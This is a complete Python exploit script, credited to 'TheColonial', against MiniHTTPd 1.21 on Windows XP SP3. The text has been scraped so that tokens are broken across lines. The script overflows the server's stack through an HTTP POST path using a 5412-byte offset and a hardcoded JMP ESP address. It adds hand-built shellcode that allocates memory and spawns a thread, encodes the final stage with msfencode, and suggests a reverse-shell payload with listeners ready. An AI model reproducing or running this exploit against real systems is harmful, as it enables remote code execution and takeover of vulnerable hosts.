import
struct, socket, sys, subprocess
def
file_content(path):
with
open
(path,
'rb'
) as f:
return
f.read()
def
pwn(host, port, payload):
print
"[*] Connecting to {0}:{1}..."
.
format
(host, port)
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print
"[*] Connected, sending payload {0} bytes..."
.
format
(
len
(payload))
payload
=
"POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n"
.
format
(payload, host)
s.send(payload)
s.shutdown
s.close
print
"[+] Payload of {0} bytes sent, hopefully your shellcode executed."
.
format
(
len
(payload))
def
create_payload_thread(final_payload_size):
VirtualAlloc
=
struct.pack(
"<L"
,
0x7c809AE1
)
CreateThread
=
struct.pack(
"<L"
,
0x7c8106c7
)
SuspendThread
=
struct.pack(
"<L"
,
0x7c83974A
)
payload
=
""
payload
+
=
"\x83\xec\x02"
payload
+
=
"\x89\xe6"
payload
+
=
"\x83\xc6\x00"
count_offset
=
len
(payload)
-
1
payload
+
=
"\x31\xdb"
payload
+
=
"\x6a\x40"
payload
+
=
"\x68\x00\x30\x00\x00"
payload
+
=
"\x68\x00\x10\x00\x00"
payload
+
=
"\x53"
payload
+
=
"\xB8"
+
VirtualAlloc
payload
+
=
"\xff\xd0"
size_bin
=
struct.pack(
"<L"
, final_payload_size
+
4
)
payload
+
=
"\xb9"
+
size_bin
payload
+
=
"\x89\xc7"
payload
+
=
"\xf2\xa4"
payload
+
=
"\x53"
payload
+
=
"\x53"
payload
+
=
"\x53"
payload
+
=
"\x50"
payload
+
=
"\x53"
payload
+
=
"\x53"
payload
+
=
"\xB8"
+
CreateThread
payload
+
=
"\xff\xd0"
payload
+
=
"\x4b"
payload
+
=
"\x4b"
payload
+
=
"\x53"
payload
+
=
"\xB8"
+
SuspendThread
payload
+
=
"\xff\xd0"
payload
+
=
"\x90"
*
4
size
=
len
(payload)
+
final_payload_size
%
4
print
"[*] Final stage is {0} bytes."
.
format
(final_payload_size)
offset
=
struct.pack(
"B"
, size)
return
payload[
0
:count_offset]
+
offset
+
payload[count_offset
+
1
:
len
(payload)]
def
create_stage1():
eip_offset
=
5412
jmp_esp
=
struct.pack(
"<L"
,
0x7e4456F7
)
eip_offset2
=
eip_offset
+
4
payload
=
""
payload
+
=
"A"
*
eip_offset
payload
+
=
jmp_esp
payload
+
=
"\x90"
payload
+
=
"\x83\xEC\x21"
return
payload
def
create_encoded_shellcode(payload):
print
"[*] Input payload of {0} bytes received. Encoding..."
.
format
(
len
(payload))
params
=
[
'msfencode'
,
'-e'
,
'x86/opt_sub'
,
'-t'
,
'raw'
,
'BufferRegister=ESP'
,
'BufferOffset=42'
,
'ValidCharSet=filepath'
]
encode
=
subprocess.Popen(params, stdout
=
subprocess.PIPE, stdin
=
subprocess.PIPE)
shellcode, _
=
encode.communicate(payload)
print
"[*] Shellcode of {0} bytes generated."
.
format
(
len
(shellcode))
return
shellcode
print
""
print
"MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
print
"-----------------------------------------------------"
print
""
print
" Note: msfencode must be in the path and Metasploit must be up to date."
if
len
(sys.argv) !
=
4
:
print
""
print
" Usage: {0} <host> <port> <payloadfile>"
.
format
(sys.argv[
0
])
print
""
print
" host : IP/name of the target host."
print
" port : Port that the target is running on."
print
" payloadfile : A file with the raw payload that is to be run."
print
" This should be the raw, non-encoded output of"
print
" a call to msfpayload"
print
""
print
" eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
print
""
else
:
print
""
print
" Make sure you have your listeners running!"
print
""
host
=
sys.argv[
1
]
port
=
int
(sys.argv[
2
])
payload_file
=
sys.argv[
3
]
stage1
=
create_stage1()
final_stage
=
file_content(payload_file)
thread_payload
=
create_payload_thread(
len
(final_stage))
shellcode
=
create_encoded_shellcode(thread_payload
+
final_stage)
padding
=
"A"
*
0x10
pwn(host, port, stage1
+
shellcode
+
padding)